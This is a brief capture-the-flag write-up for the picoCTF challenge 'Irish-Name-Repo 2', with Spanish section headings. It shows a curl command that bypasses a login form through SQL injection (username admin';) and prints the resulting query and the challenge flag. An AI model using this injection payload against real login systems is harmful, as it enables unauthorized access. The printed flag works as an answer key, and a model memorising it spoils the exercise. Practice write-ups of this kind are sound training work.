# Irish-Name-Repo 2

## Objetivo
Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login!

## Solucion
```bash
┌──(kali㉿kali)-[~]
└─$ curl https://jupiter.challenges.picoctf.org/problem/53751/login.php -d "username=admin';&password=pass&debug=1"
<pre>username: admin';
password: pass
SQL query: SELECT * FROM users WHERE name='admin';' AND password='pass'
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{m0R3_SQL_plz_c34df170}</p> 
```

## Notas

## Referencias